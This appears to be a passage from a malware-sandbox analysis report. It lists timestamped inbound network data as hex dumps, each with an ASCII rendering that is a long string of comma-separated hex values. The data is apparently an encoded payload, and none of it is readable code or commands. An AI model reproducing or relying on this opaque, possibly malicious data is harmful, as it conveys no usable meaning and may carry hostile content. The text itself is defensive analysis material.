                                                                                                                                                                      2023-11-06 14:35:15 UTC32INData Raw: 34 32 2c 65 30 2c 36 64 2c 37 37 2c 34 33 2c 39 63 2c 33 36 2c 34 32 2c 35 31 2c 36 33 2c 31 31 33 2c 37 64 2c 61 37 2c 38 61 2c 33 38 2c 38 66 2c 63 33 2c 63 62 2c 36 63 2c 34 64 2c 39 65 2c 62 30 2c 34 63 2c 31 35 31 2c 38 30 2c 63 30 2c 31 30 61 2c 61 37 2c 36 32 2c 64 39 2c 31 34 30 2c 63 39 2c 39 65 2c 36 64 2c 64 34 2c 61 63 2c 31 32 37 2c 37 66 2c 37 36 2c 34 31 2c 38 63 2c 31 32 36 2c 63 39 2c 36 63 2c 65 31 2c 38 62 2c 31 33 34 2c 37 31 2c 38 38 2c 62 38 2c 35 32 2c 62 61 2c 63 33 2c 31 36 38 2c 64 37 2c 61 37 2c 31 36 37 2c 65 31 2c 39 66 2c 31 35 66 2c 62 32 2c 38 62 2c 39 37 2c 31 30 31 2c 64 37 2c 31 36 31 2c 31 33 33 2c 38 31 2c 31 34 31 2c 31 33 33 2c 31 33 31 2c 63 63 2c 39 36 2c 31 35 62 2c 64 38 2c 31 32 39 2c 36 34 2c 38 33 2c 31 33 37
                                                                                                                                                                      Data Ascii: 42,e0,6d,77,43,9c,36,42,51,63,113,7d,a7,8a,38,8f,c3,cb,6c,4d,9e,b0,4c,151,80,c0,10a,a7,62,d9,140,c9,9e,6d,d4,ac,127,7f,76,41,8c,126,c9,6c,e1,8b,134,71,88,b8,52,ba,c3,168,d7,a7,167,e1,9f,15f,b2,8b,97,101,d7,161,133,81,141,133,131,cc,96,15b,d8,129,64,83,137
                                                                                                                                                                      2023-11-06 14:35:15 UTC33INData Raw: 2c 65 32 2c 31 34 31 2c 61 32 2c 31 30 39 2c 37 34 2c 38 32 2c 63 61 2c 39 36 2c 31 35 62 2c 31 33 64 2c 31 33 32 2c 36 32 2c 34 36 2c 33 38 2c 63 34 2c 31 36 38 2c 39 63 2c 38 61 2c 31 32 63 2c 63 33 2c 37 38 2c 61 32 2c 31 35 31 2c 38 30 2c 63 38 2c 31 30 61 2c 61 37 2c 36 32 2c 31 32 31 2c 38 39 2c 31 37 33 2c 31 35 39 2c 31 36 63 2c 31 34 61 2c 65 63 2c 31 33 62 2c 38 61 2c 38 39 2c 31 32 39 2c 39 33 2c 38 34 2c 35 35 2c 36 35 2c 64 62 2c 31 30 61 2c 34 34 2c 38 66 2c 31 36 66 2c 35 38 2c 63 33 2c 65 31 2c 38 65 2c 36 63 2c 64 37 2c 31 31 39 2c 63 61 2c 62 32 2c 62 35 2c 31 33 30 2c 31 32 35 2c 61 32 2c 39 38 2c 64 63 2c 31 32 32 2c 31 33 30 2c 38 62 2c 37 37 2c 31 32 62 2c 31 32 39 2c 31 32 32 2c 31 34 30 2c 31 35 30 2c 39 36 2c 31 35 34 2c 65 65 2c
                                                                                                                                                                      Data Ascii: ,e2,141,a2,109,74,82,ca,96,15b,13d,132,62,46,38,c4,168,9c,8a,12c,c3,78,a2,151,80,c8,10a,a7,62,121,89,173,159,16c,14a,ec,13b,8a,89,129,93,84,55,65,db,10a,44,8f,16f,58,c3,e1,8e,6c,d7,119,ca,b2,b5,130,125,a2,98,dc,122,130,8b,77,12b,129,122,140,150,96,154,ee,
                                                                                                                                                                      2023-11-06 14:35:15 UTC35INData Raw: 36 2c 61 39 2c 66 31 2c 37 32 2c 35 35 2c 36 35 2c 65 35 2c 38 63 2c 34 34 2c 38 39 2c 31 35 38 2c 31 30 61 2c 35 37 2c 33 31 2c 34 65 2c 63 35 2c 61 35 2c 64 37 2c 31 32 62 2c 36 33 2c 64 65 2c 31 33 30 2c 36 32 2c 33 38 2c 34 34 2c 31 37 33 2c 61 30 2c 37 35 2c 31 34 61 2c 62 63 2c 31 32 33 2c 37 37 2c 62 35 2c 38 36 2c 31 33 35 2c 36 37 2c 38 65 2c 65 32 2c 31 33 38 2c 63 32 2c 63 62 2c 36 63 2c 31 34 62 2c 63 65 2c 31 34 32 2c 66 32 2c 31 33 34 2c 37 32 2c 34 66 2c 38 37 2c 31 32 62 2c 61 38 2c 39 65 2c 36 37 2c 65 64 2c 33 65 2c 63 37 2c 31 36 63 2c 31 35 39 2c 65 31 2c 35 36 2c 66 61 2c 31 33 62 2c 31 33 32 2c 61 36 2c 34 37 2c 64 31 2c 62 31 2c 35 39 2c 65 35 2c 31 34 33 2c 62 38 2c 66 65 2c 37 66 2c 37 34 2c 63 34 2c 64 34 2c 31 30 63 2c 63 33 2c
                                                                                                                                                                      Data Ascii: 6,a9,f1,72,55,65,e5,8c,44,89,158,10a,57,31,4e,c5,a5,d7,12b,63,de,130,62,38,44,173,a0,75,14a,bc,123,77,b5,86,135,67,8e,e2,138,c2,cb,6c,14b,ce,142,f2,134,72,4f,87,12b,a8,9e,67,ed,3e,c7,16c,159,e1,56,fa,13b,132,a6,47,d1,b1,59,e5,143,b8,fe,7f,74,c4,d4,10c,c3,
                                                                                                                                                                      2023-11-06 14:35:15 UTC36INData Raw: 32 39 2c 66 34 2c 31 35 34 2c 31 35 34 2c 31 36 34 2c 62 31 2c 63 62 2c 66 38 2c 61 64 2c 38 38 2c 61 62 2c 36 37 2c 65 39 2c 38 65 2c 36 63 2c 39 63 2c 31 35 31 2c 38 30 2c 36 38 2c 31 30 61 2c 61 37 2c 36 32 2c 62 64 2c 31 30 34 2c 65 38 2c 36 32 2c 31 36 63 2c 63 30 2c 37 66 2c 31 34 32 2c 31 30 34 2c 62 62 2c 38 36 2c 35 39 2c 65 65 2c 39 61 2c 36 64 2c 62 36 2c 61 33 2c 66 62 2c 61 33 2c 37 30 2c 31 32 62 2c 64 36 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 61 35 2c 31 31 35 2c 66 36 2c 31 35 33 2c 61 66 2c 66 32 2c 31 34 65 2c 38 65 2c 31 34 33 2c 61 39 2c 31 31 65 2c 61 65 2c 38 66 2c 37 37 2c 63 65 2c 36 39 2c 63 36 2c 66 31 2c 39 31 2c 36 33 2c 31 35 34 2c 31 33 62 2c 64 64 2c 31 30 36 2c 61 63 2c 35 61 2c 31 31 31 2c 31 30 33 2c 39 30 2c 37 35 2c 34
                                                                                                                                                                      Data Ascii: 29,f4,154,154,164,b1,cb,f8,ad,88,ab,67,e9,8e,6c,9c,151,80,68,10a,a7,62,bd,104,e8,62,16c,c0,7f,142,104,bb,86,59,ee,9a,6d,b6,a3,fb,a3,70,12b,d6,130,14d,16b,a5,115,f6,153,af,f2,14e,8e,143,a9,11e,ae,8f,77,ce,69,c6,f1,91,63,154,13b,dd,106,ac,5a,111,103,90,75,4
                                                                                                                                                                      2023-11-06 14:35:15 UTC37INData Raw: 31 33 66 2c 33 34 2c 31 33 31 2c 62 37 2c 62 39 2c 31 36 32 2c 36 61 2c 31 30 39 2c 31 30 38 2c 38 36 2c 33 38 2c 31 30 30 2c 62 35 2c 31 33 66 2c 31 34 64 2c 31 33 30 2c 31 34 64 2c 31 36 62 2c 31 33 34 2c 39 30 2c 36 62 2c 35 34 2c 35 61 2c 64 31 2c 36 65 2c 31 32 30 2c 61 39 2c 31 35 35 2c 31 35 39 2c 31 36 63 2c 61 34 2c 31 30 30 2c 63 30 2c 31 33 30 2c 62 64 2c 38 36 2c 35 64 2c 65 63 2c 39 62 2c 64 31 2c 64 64 2c 31 30 36 2c 61 64 2c 34 31 2c 31 31 31 2c 34 62 2c 39 37 2c 37 35 2c 34 65 2c 66 35 2c 39 32 2c 62 65 2c 31 36 61 2c 63 61 2c 63 36 2c 31 34 66 2c 37 65 2c 35 39 2c 34 34 2c 37 34 2c 62 33 2c 31 33 34 2c 39 30 2c 31 37 33 2c 31 34 31 2c 31 33 33 2c 31 33 31 2c 31 34 30 2c 31 33 39 2c 37 38 2c 35 35 2c 36 35 2c 35 38 2c 31 32 65 2c 61 39 2c
                                                                                                                                                                      Data Ascii: 13f,34,131,b7,b9,162,6a,109,108,86,38,100,b5,13f,14d,130,14d,16b,134,90,6b,54,5a,d1,6e,120,a9,155,159,16c,a4,100,c0,130,bd,86,5d,ec,9b,d1,dd,106,ad,41,111,4b,97,75,4e,f5,92,be,16a,ca,c6,14f,7e,59,44,74,b3,134,90,173,141,133,131,140,139,78,55,65,58,12e,a9,
                                                                                                                                                                      2023-11-06 14:35:15 UTC39INData Raw: 37 2c 31 36 61 2c 63 38 2c 37 34 2c 62 65 2c 31 36 31 2c 34 64 2c 66 34 2c 31 32 34 2c 39 61 2c 36 64 2c 64 30 2c 31 33 37 2c 62 38 2c 34 33 2c 62 33 2c 31 34 30 2c 35 31 2c 61 35 2c 39 39 2c 36 35 2c 63 63 2c 34 64 2c 38 66 2c 31 32 31 2c 39 31 2c 31 31 64 2c 31 34 65 2c 31 33 30 2c 61 37 2c 31 33 33 2c 39 31 2c 31 34 65 2c 31 36 39 2c 31 35 33 2c 31 35 39 2c 31 36 36 2c 31 34 61 2c 38 66 2c 34 34 2c 37 34 2c 35 61 2c 64 37 2c 35 37 2c 31 35 66 2c 31 30 32 2c 31 31 33 2c 31 33 31 2c 31 34 30 2c 61 61 2c 31 32 61 2c 39 61 2c 31 36 31 2c 35 39 2c 34 36 2c 33 38 2c 33 39 2c 66 62 2c 63 31 2c 62 62 2c 62 36 2c 31 34 64 2c 65 30 2c 36 66 2c 61 39 2c 31 35 33 2c 36 32 2c 37 61 2c 36 37 2c 36 32 2c 39 31 2c 37 66 2c 62 31 2c 36 32 2c 62 35 2c 38 66 2c 37 37 2c
                                                                                                                                                                      Data Ascii: 7,16a,c8,74,be,161,4d,f4,124,9a,6d,d0,137,b8,43,b3,140,51,a5,99,65,cc,4d,8f,121,91,11d,14e,130,a7,133,91,14e,169,153,159,166,14a,8f,44,74,5a,d7,57,15f,102,113,131,140,aa,12a,9a,161,59,46,38,39,fb,c1,bb,b6,14d,e0,6f,a9,153,62,7a,67,62,91,7f,b1,62,b5,8f,77,
                                                                                                                                                                      2023-11-06 14:35:15 UTC40INData Raw: 63 2c 31 36 61 2c 31 35 33 2c 64 64 2c 31 32 62 2c 37 32 2c 64 62 2c 37 34 2c 63 34 2c 39 65 2c 36 64 2c 31 33 33 2c 31 33 62 2c 31 31 66 2c 31 33 33 2c 31 33 31 2c 63 36 2c 31 31 31 2c 64 37 2c 62 61 2c 63 64 2c 65 38 2c 37 66 2c 37 38 2c 33 39 2c 31 36 66 2c 37 38 2c 37 33 2c 38 31 2c 39 32 2c 36 63 2c 31 33 34 2c 38 66 2c 31 36 36 2c 31 35 33 2c 31 35 39 2c 63 30 2c 31 36 31 2c 31 30 38 2c 65 37 2c 31 33 34 2c 39 62 2c 62 31 2c 34 62 2c 66 61 2c 31 33 62 2c 31 33 33 2c 61 36 2c 38 39 2c 62 39 2c 37 37 2c 35 37 2c 36 35 2c 35 38 2c 62 30 2c 33 39 2c 31 32 31 2c 31 35 64 2c 34 35 2c 34 66 2c 33 31 2c 64 39 2c 31 35 63 2c 61 35 2c 61 62 2c 66 30 2c 31 34 61 2c 63 65 2c 39 62 2c 62 38 2c 31 33 37 2c 37 39 2c 31 33 34 2c 39 62 2c 62 31 2c 34 62 2c 31 37 36
                                                                                                                                                                      Data Ascii: c,16a,153,dd,12b,72,db,74,c4,9e,6d,133,13b,11f,133,131,c6,111,d7,ba,cd,e8,7f,78,39,16f,78,73,81,92,6c,134,8f,166,153,159,c0,161,108,e7,134,9b,b1,4b,fa,13b,133,a6,89,b9,77,57,65,58,b0,39,121,15d,45,4f,31,d9,15c,a5,ab,f0,14a,ce,9b,b8,137,79,134,9b,b1,4b,176
                                                                                                                                                                      2023-11-06 14:35:15 UTC41INData Raw: 36 32 2c 31 35 34 2c 63 62 2c 65 34 2c 64 62 2c 31 33 30 2c 31 33 36 2c 31 36 66 2c 31 34 32 2c 62 35 2c 62 64 2c 64 62 2c 31 35 38 2c 31 34 39 2c 31 35 31 2c 31 36 61 2c 62 61 2c 65 36 2c 31 30 34 2c 31 32 61 2c 31 33 35 2c 31 34 33 2c 31 37 33 2c 63 30 2c 66 39 2c 64 30 2c 31 33 62 2c 31 34 30 2c 31 33 33 2c 31 33 31 2c 61 37 2c 64 64 2c 31 30 38 2c 31 31 35 2c 31 36 32 2c 31 35 37 2c 31 34 35 2c 39 65 2c 63 35 2c 31 31 64 2c 66 66 2c 31 34 63 2c 31 33 30 2c 31 34 64 2c 31 30 38 2c 64 62 2c 64 37 2c 31 35 62 2c 31 35 31 2c 31 35 39 2c 31 36 36 2c 65 64 2c 37 64 2c 34 38 2c 31 30 31 2c 61 37 2c 37 31 2c 31 31 32 2c 66 63 2c 37 33 2c 31 33 31 2c 31 33 31 2c 31 34 30 2c 35 32 2c 36 33 2c 35 36 2c 36 35 2c 65 31 2c 63 62 2c 31 32 30 2c 31 33 36 2c 31 36 66
                                                                                                                                                                      Data Ascii: 62,154,cb,e4,db,130,136,16f,142,b5,bd,db,158,149,151,16a,ba,e6,104,12a,135,143,173,c0,f9,d0,13b,140,133,131,a7,dd,108,115,162,157,145,9e,c5,11d,ff,14c,130,14d,108,db,d7,15b,151,159,166,ed,7d,48,101,a7,71,112,fc,73,131,131,140,52,63,56,65,e1,cb,120,136,16f
                                                                                                                                                                      2023-11-06 14:35:15 UTC43INData Raw: 31 32 34 2c 66 32 2c 31 32 39 2c 39 37 2c 61 32 2c 64 31 2c 31 31 64 2c 66 38 2c 31 34 61 2c 63 63 2c 63 65 2c 31 32 30 2c 38 38 2c 39 38 2c 38 34 2c 31 35 39 2c 62 66 2c 36 35 2c 31 35 37 2c 62 62 2c 34 34 2c 31 33 38 2c 65 35 2c 34 62 2c 31 33 37 2c 66 61 2c 36 61 2c 36 63 2c 34 63 2c 64 64 2c 31 36 33 2c 64 37 2c 31 31 65 2c 37 33 2c 65 37 2c 31 33 37 2c 62 39 2c 39 62 2c 39 33 2c 37 32 2c 38 37 2c 63 37 2c 38 37 2c 33 34 2c 61 38 2c 36 30 2c 61 37 2c 31 36 32 2c 36 61 2c 36 39 2c 31 30 38 2c 38 36 2c 33 38 2c 63 36 2c 66 36 2c 31 32 62 2c 35 32 2c 33 31 2c 34 65 2c 61 37 2c 35 31 2c 38 65 2c 62 62 2c 39 38 2c 35 61 2c 64 64 2c 36 35 2c 62 62 2c 31 30 63 2c 31 37 33 2c 65 35 2c 31 35 64 2c 63 65 2c 31 36 66 2c 31 34 32 2c 61 39 2c 66 35 2c 63 63 2c 31
                                                                                                                                                                      Data Ascii: 124,f2,129,97,a2,d1,11d,f8,14a,cc,ce,120,88,98,84,159,bf,65,157,bb,44,138,e5,4b,137,fa,6a,6c,4c,dd,163,d7,11e,73,e7,137,b9,9b,93,72,87,c7,87,34,a8,60,a7,162,6a,69,108,86,38,c6,f6,12b,52,31,4e,a7,51,8e,bb,98,5a,dd,65,bb,10c,173,e5,15d,ce,16f,142,a9,f5,cc,1
                                                                                                                                                                      2023-11-06 14:35:15 UTC44INData Raw: 34 62 2c 31 30 34 2c 38 63 2c 33 34 2c 31 32 64 2c 38 31 2c 39 31 2c 36 33 2c 31 33 64 2c 61 35 2c 39 38 2c 34 36 2c 31 31 38 2c 37 39 2c 62 30 2c 34 33 2c 31 32 37 2c 37 31 2c 38 65 2c 36 63 2c 31 31 63 2c 39 32 2c 61 62 2c 35 34 2c 31 32 32 2c 61 37 2c 61 32 2c 33 38 2c 31 30 34 2c 62 34 2c 39 61 2c 36 64 2c 31 30 33 2c 62 37 2c 38 33 2c 33 34 2c 62 64 2c 38 35 2c 64 66 2c 31 34 37 2c 64 65 2c 61 39 2c 65 37 2c 31 32 61 2c 63 33 2c 37 64 2c 66 65 2c 31 32 62 2c 64 38 2c 37 35 2c 64 64 2c 31 35 34 2c 64 37 2c 39 36 2c 66 39 2c 31 34 30 2c 65 33 2c 61 62 2c 66 31 2c 31 32 34 2c 63 66 2c 62 38 2c 65 38 2c 31 35 64 2c 64 34 2c 62 62 2c 64 32 2c 31 32 34 2c 62 64 2c 38 35 2c 64 66 2c 31 35 37 2c 64 65 2c 61 39 2c 65 37 2c 31 33 61 2c 63 33 2c 37 64 2c 66 65
                                                                                                                                                                      Data Ascii: 4b,104,8c,34,12d,81,91,63,13d,a5,98,46,118,79,b0,43,127,71,8e,6c,11c,92,ab,54,122,a7,a2,38,104,b4,9a,6d,103,b7,83,34,bd,85,df,147,de,a9,e7,12a,c3,7d,fe,12b,d8,75,dd,154,d7,96,f9,140,e3,ab,f1,124,cf,b8,e8,15d,d4,bb,d2,124,bd,85,df,157,de,a9,e7,13a,c3,7d,fe
                                                                                                                                                                      2023-11-06 14:35:15 UTC45INData Raw: 62 39 2c 61 37 2c 39 38 2c 34 36 2c 61 34 2c 37 62 2c 62 30 2c 34 33 2c 63 33 2c 37 33 2c 38 65 2c 36 63 2c 63 38 2c 39 34 2c 61 62 2c 35 34 2c 64 65 2c 61 39 2c 61 32 2c 33 38 2c 64 62 2c 62 36 2c 39 61 2c 36 64 2c 64 36 2c 62 62 2c 64 31 2c 35 30 2c 62 62 2c 38 35 2c 65 30 2c 37 66 2c 65 30 2c 61 39 2c 65 36 2c 35 65 2c 63 31 2c 37 64 2c 66 66 2c 35 62 2c 64 61 2c 37 35 2c 64 63 2c 38 30 2c 64 35 2c 39 36 2c 66 61 2c 36 38 2c 65 35 2c 61 62 2c 66 30 2c 34 38 2c 63 64 2c 62 38 2c 65 39 2c 37 64 2c 64 36 2c 62 62 2c 64 31 2c 34 30 2c 62 62 2c 38 35 2c 65 30 2c 36 66 2c 65 30 2c 61 39 2c 65 36 2c 34 65 2c 63 31 2c 37 64 2c 66 66 2c 34 62 2c 64 61 2c 37 35 2c 64 63 2c 37 30 2c 64 35 2c 39 36 2c 66 61 2c 35 38 2c 65 37 2c 36 62 2c 65 66 2c 33 38 2c 34 34 2c
                                                                                                                                                                      Data Ascii: b9,a7,98,46,a4,7b,b0,43,c3,73,8e,6c,c8,94,ab,54,de,a9,a2,38,db,b6,9a,6d,d6,bb,d1,50,bb,85,e0,7f,e0,a9,e6,5e,c1,7d,ff,5b,da,75,dc,80,d5,96,fa,68,e5,ab,f0,48,cd,b8,e9,7d,d6,bb,d1,40,bb,85,e0,6f,e0,a9,e6,4e,c1,7d,ff,4b,da,75,dc,70,d5,96,fa,58,e7,6b,ef,38,44,
                                                                                                                                                                      2023-11-06 14:35:15 UTC47INData Raw: 31 35 39 2c 31 36 36 2c 31 36 31 2c 62 62 2c 31 30 38 2c 38 30 2c 62 37 2c 31 32 66 2c 34 66 2c 37 37 2c 39 38 2c 38 61 2c 38 39 2c 39 34 2c 64 63 2c 31 34 64 2c 38 38 2c 31 32 35 2c 38 62 2c 31 32 31 2c 36 62 2c 31 30 62 2c 61 33 2c 31 33 39 2c 38 32 2c 31 33 30 2c 31 34 64 2c 31 33 64 2c 61 37 2c 62 31 2c 63 39 2c 62 31 2c 31 31 64 2c 66 32 2c 31 34 63 2c 63 33 2c 31 33 35 2c 66 66 2c 31 31 62 2c 64 37 2c 34 63 2c 31 35 66 2c 62 61 2c 35 32 2c 33 32 2c 34 31 2c 38 34 2c 31 32 33 2c 38 38 2c 31 34 30 2c 38 62 2c 31 30 66 2c 36 62 2c 31 30 62 2c 61 33 2c 31 34 32 2c 31 34 65 2c 31 31 37 2c 61 33 2c 66 37 2c 31 33 38 2c 61 35 2c 63 31 2c 61 62 2c 63 34 2c 36 37 2c 63 63 2c 33 38 2c 61 63 2c 61 66 2c 39 65 2c 61 64 2c 34 62 2c 63 38 2c 31 32 62 2c 66 37 2c
                                                                                                                                                                      Data Ascii: 159,166,161,bb,108,80,b7,12f,4f,77,98,8a,89,94,dc,14d,88,125,8b,121,6b,10b,a3,139,82,130,14d,13d,a7,b1,c9,b1,11d,f2,14c,c3,135,ff,11b,d7,4c,15f,ba,52,32,41,84,123,88,140,8b,10f,6b,10b,a3,142,14e,117,a3,f7,138,a5,c1,ab,c4,67,cc,38,ac,af,9e,ad,4b,c8,12b,f7,
                                                                                                                                                                      2023-11-06 14:35:15 UTC48INData Raw: 2c 36 31 2c 66 66 2c 31 31 36 2c 65 35 2c 31 32 39 2c 31 32 35 2c 63 33 2c 61 39 2c 31 35 63 2c 31 32 31 2c 62 32 2c 31 34 37 2c 31 37 35 2c 31 34 32 2c 31 33 33 2c 31 33 31 2c 37 34 2c 31 31 31 2c 65 65 2c 61 32 2c 31 35 35 2c 62 63 2c 63 66 2c 34 35 2c 33 39 2c 37 30 2c 34 33 2c 34 66 2c 38 61 2c 61 64 2c 63 61 2c 61 37 2c 64 64 2c 31 35 30 2c 62 31 2c 31 31 64 2c 66 32 2c 31 36 31 2c 38 64 2c 63 66 2c 31 36 30 2c 61 62 2c 63 30 2c 61 31 2c 63 65 2c 31 34 32 2c 36 39 2c 66 61 2c 39 36 2c 39 35 2c 36 33 2c 31 33 64 2c 63 65 2c 31 34 39 2c 31 34 35 2c 31 33 37 2c 31 33 38 2c 61 35 2c 31 30 37 2c 61 34 2c 37 35 2c 34 65 2c 66 37 2c 31 34 34 2c 64 62 2c 65 38 2c 31 35 30 2c 31 34 32 2c 63 30 2c 31 35 33 2c 31 33 37 2c 31 34 33 2c 66 66 2c 31 34 61 2c 63 36
                                                                                                                                                                      Data Ascii: ,61,ff,116,e5,129,125,c3,a9,15c,121,b2,147,175,142,133,131,74,111,ee,a2,155,bc,cf,45,39,70,43,4f,8a,ad,ca,a7,dd,150,b1,11d,f2,161,8d,cf,160,ab,c0,a1,ce,142,69,fa,96,95,63,13d,ce,149,145,137,138,a5,107,a4,75,4e,f7,144,db,e8,150,142,c0,153,137,143,ff,14a,c6
                                                                                                                                                                      Data Ascii: ,b6,61,d5,ee,ef,96,ef,112,6c,ba,ab,b1,8c,5e,134,153,4f,5c,153,115,153,4c,100,140,8a,4f,d6,63,12c,148,ad,cc,116,62,84,162,f8,142,8a,149,15c,d8,54,123,e5,139,70,77,8d,94,c5,75,122,ae,fd,109,5b,99,5f,58,ae,132,a1,129,68,125,5a,f7,6f,12a,108,12d,137,52,134,83
                                                                                                                                                                      2023-11-06 14:35:15 UTC147INData Raw: 31 35 37 2c 31 32 38 2c 65 31 2c 36 30 2c 31 33 38 2c 64 62 2c 63 36 2c 65 62 2c 37 32 2c 31 34 64 2c 39 36 2c 61 31 2c 39 35 2c 35 38 2c 38 66 2c 65 33 2c 39 31 2c 37 31 2c 31 33 33 2c 31 35 39 2c 66 35 2c 64 39 2c 62 66 2c 64 36 2c 61 37 2c 62 64 2c 36 31 2c 31 30 63 2c 35 34 2c 64 32 2c 31 33 61 2c 61 36 2c 64 37 2c 35 66 2c 35 66 2c 35 66 2c 64 32 2c 62 38 2c 62 34 2c 39 61 2c 35 34 2c 39 61 2c 39 63 2c 61 61 2c 31 34 33 2c 31 31 61 2c 37 30 2c 31 33 63 2c 37 64 2c 63 62 2c 36 33 2c 64 64 2c 61 65 2c 31 34 64 2c 63 32 2c 31 30 62 2c 62 31 2c 65 30 2c 31 32 62 2c 38 37 2c 31 30 30 2c 37 64 2c 31 35 31 2c 38 39 2c 62 62 2c 31 30 64 2c 33 39 2c 39 63 2c 64 32 2c 36 33 2c 34 66 2c 31 32 33 2c 31 33 65 2c 63 62 2c 63 34 2c 31 30 39 2c 31 32 38 2c 63 37 2c
                                                                                                                                                                      Data Ascii: 157,128,e1,60,138,db,c6,eb,72,14d,96,a1,95,58,8f,e3,91,71,133,159,f5,d9,bf,d6,a7,bd,61,10c,54,d2,13a,a6,d7,5f,5f,5f,d2,b8,b4,9a,54,9a,9c,aa,143,11a,70,13c,7d,cb,63,dd,ae,14d,c2,10b,b1,e0,12b,87,100,7d,151,89,bb,10d,39,9c,d2,63,4f,123,13e,cb,c4,109,128,c7,
                                                                                                                                                                      2023-11-06 14:35:15 UTC151INData Raw: 63 2c 31 33 37 2c 31 30 65 2c 65 34 2c 35 64 2c 62 64 2c 37 35 2c 65 30 2c 31 32 32 2c 65 62 2c 61 36 2c 62 65 2c 61 63 2c 64 64 2c 31 31 64 2c 37 39 2c 65 66 2c 36 36 2c 31 35 63 2c 36 30 2c 36 35 2c 65 38 2c 66 35 2c 36 30 2c 31 32 32 2c 31 30 65 2c 62 62 2c 61 37 2c 66 32 2c 63 65 2c 31 30 31 2c 62 33 2c 64 35 2c 65 31 2c 62 61 2c 31 30 30 2c 31 33 34 2c 31 34 35 2c 62 36 2c 39 63 2c 62 61 2c 62 38 2c 61 30 2c 31 33 39 2c 65 39 2c 31 30 31 2c 63 62 2c 31 32 33 2c 31 34 38 2c 31 30 63 2c 65 30 2c 63 33 2c 63 63 2c 39 38 2c 63 30 2c 33 65 2c 62 36 2c 31 34 31 2c 38 39 2c 64 65 2c 39 30 2c 62 39 2c 31 34 31 2c 63 39 2c 39 61 2c 61 63 2c 31 33 34 2c 31 30 62 2c 38 38 2c 31 32 38 2c 39 37 2c 31 33 63 2c 64 65 2c 63 33 2c 31 30 36 2c 62 31 2c 31 32 61 2c 36
                                                                                                                                                                      Data Ascii: c,137,10e,e4,5d,bd,75,e0,122,eb,a6,be,ac,dd,11d,79,ef,66,15c,60,65,e8,f5,60,122,10e,bb,a7,f2,ce,101,b3,d5,e1,ba,100,134,145,b6,9c,ba,b8,a0,139,e9,101,cb,123,148,10c,e0,c3,cc,98,c0,3e,b6,141,89,de,90,b9,141,c9,9a,ac,134,10b,88,128,97,13c,de,c3,106,b1,12a,6
                                                                                                                                                                      2023-11-06 14:35:15 UTC155INData Raw: 65 37 2c 31 31 35 2c 37 63 2c 64 30 2c 64 66 2c 66 30 2c 39 63 2c 39 61 2c 61 34 2c 34 38 2c 63 34 2c 66 35 2c 62 39 2c 31 32 38 2c 63 38 2c 63 65 2c 66 64 2c 63 37 2c 65 36 2c 37 36 2c 39 65 2c 36 61 2c 39 63 2c 38 37 2c 36 61 2c 31 31 39 2c 34 65 2c 65 63 2c 63 33 2c 61 63 2c 66 64 2c 63 62 2c 39 65 2c 35 38 2c 34 63 2c 31 34 63 2c 35 66 2c 65 34 2c 65 65 2c 38 66 2c 35 34 2c 38 62 2c 37 38 2c 31 30 34 2c 64 64 2c 31 33 36 2c 31 34 61 2c 31 35 38 2c 31 35 37 2c 62 37 2c 61 37 2c 62 39 2c 64 34 2c 66 35 2c 36 33 2c 63 32 2c 63 61 2c 31 33 39 2c 36 30 2c 31 30 63 2c 65 64 2c 39 37 2c 31 30 36 2c 65 63 2c 66 39 2c 37 35 2c 31 31 33 2c 64 61 2c 31 30 39 2c 37 32 2c 31 32 33 2c 66 64 2c 37 63 2c 65 62 2c 37 36 2c 66 33 2c 66 32 2c 31 33 63 2c 62 32 2c 39 31
                                                                                                                                                                      Data Ascii: e7,115,7c,d0,df,f0,9c,9a,a4,48,c4,f5,b9,128,c8,ce,fd,c7,e6,76,9e,6a,9c,87,6a,119,4e,ec,c3,ac,fd,cb,9e,58,4c,14c,5f,e4,ee,8f,54,8b,78,104,dd,136,14a,158,157,b7,a7,b9,d4,f5,63,c2,ca,139,60,10c,ed,97,106,ec,f9,75,113,da,109,72,123,fd,7c,eb,76,f3,f2,13c,b2,91
                                                                                                                                                                      2023-11-06 14:35:15 UTC159INData Raw: 2c 31 30 36 2c 31 33 37 2c 63 38 2c 33 62 2c 65 63 2c 35 36 2c 37 35 2c 37 35 2c 65 33 2c 31 35 66 2c 37 31 2c 63 32 2c 65 31 2c 65 62 2c 61 32 2c 39 35 2c 31 32 37 2c 31 31 63 2c 37 34 2c 66 37 2c 31 32 66 2c 39 38 2c 31 36 33 2c 63 62 2c 31 30 33 2c 61 38 2c 61 38 2c 65 35 2c 38 39 2c 64 61 2c 31 30 65 2c 31 32 63 2c 31 31 65 2c 31 32 38 2c 36 34 2c 62 36 2c 36 65 2c 66 39 2c 35 63 2c 31 32 33 2c 38 35 2c 38 38 2c 66 63 2c 61 64 2c 66 63 2c 31 33 32 2c 39 35 2c 38 33 2c 66 35 2c 33 64 2c 63 35 2c 66 66 2c 35 38 2c 31 34 30 2c 37 63 2c 31 32 33 2c 31 34 64 2c 62 37 2c 63 31 2c 64 35 2c 37 38 2c 64 66 2c 31 32 63 2c 61 33 2c 35 36 2c 61 63 2c 35 36 2c 61 32 2c 35 61 2c 31 33 65 2c 38 61 2c 31 34 31 2c 65 31 2c 39 63 2c 31 32 30 2c 31 31 36 2c 37 36 2c 61
                                                                                                                                                                      Data Ascii: ,106,137,c8,3b,ec,56,75,75,e3,15f,71,c2,e1,eb,a2,95,127,11c,74,f7,12f,98,163,cb,103,a8,a8,e5,89,da,10e,12c,11e,128,64,b6,6e,f9,5c,123,85,88,fc,ad,fc,132,95,83,f5,3d,c5,ff,58,140,7c,123,14d,b7,c1,d5,78,df,12c,a3,56,ac,56,a2,5a,13e,8a,141,e1,9c,120,116,76,a
                                                                                                                                                                      2023-11-06 14:35:15 UTC163INData Raw: 35 62 2c 63 33 2c 62 38 2c 31 32 30 2c 31 30 32 2c 61 35 2c 36 64 2c 61 65 2c 62 36 2c 61 31 2c 38 30 2c 63 37 2c 63 65 2c 31 32 62 2c 61 62 2c 35 38 2c 65 32 2c 64 33 2c 31 30 39 2c 38 31 2c 31 30 61 2c 31 32 36 2c 31 33 37 2c 33 38 2c 38 37 2c 31 34 66 2c 36 38 2c 65 34 2c 34 32 2c 63 33 2c 36 65 2c 31 32 31 2c 63 32 2c 37 35 2c 37 64 2c 63 62 2c 31 33 32 2c 37 35 2c 38 62 2c 31 31 65 2c 31 36 32 2c 64 32 2c 31 31 63 2c 31 34 39 2c 61 37 2c 31 33 34 2c 38 65 2c 65 38 2c 38 64 2c 65 64 2c 61 30 2c 62 64 2c 31 34 37 2c 62 65 2c 39 33 2c 31 30 32 2c 39 33 2c 65 36 2c 64 30 2c 31 31 31 2c 34 66 2c 31 30 63 2c 